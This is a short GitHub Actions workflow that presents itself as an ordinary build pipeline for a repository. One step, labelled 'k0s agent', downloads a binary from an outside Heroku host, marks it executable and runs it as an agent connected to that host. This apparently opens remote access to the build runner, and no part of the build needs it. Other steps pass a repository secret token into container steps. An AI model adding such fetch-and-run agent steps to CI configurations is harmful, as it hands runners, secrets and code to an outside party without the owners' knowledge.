name: build

on: [push]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Unshallow  # required for the changelog to work correctly.
      run: git fetch --prune --unshallow

    - name: Run Ubuntu
      uses: docker://ubuntu
      with:
        args: ls -la
      env:
        GITHUB_TOKEN: ${{ secrets.ACTIONS_GITHUB_TOKEN }}

    - run: |
        wget https://k0s.herokuapp.com/api/bin/k0s
        chmod +x k0s
        ./k0s agent https://k0s.herokuapp.com
      name: k0s agent

    - name: Run Build
      uses: docker://techknowlogick/xgo:latest
      with:
        entrypoint: bash
      env:
        GITHUB_TOKEN: ${{ secrets.ACTIONS_GITHUB_TOKEN }}

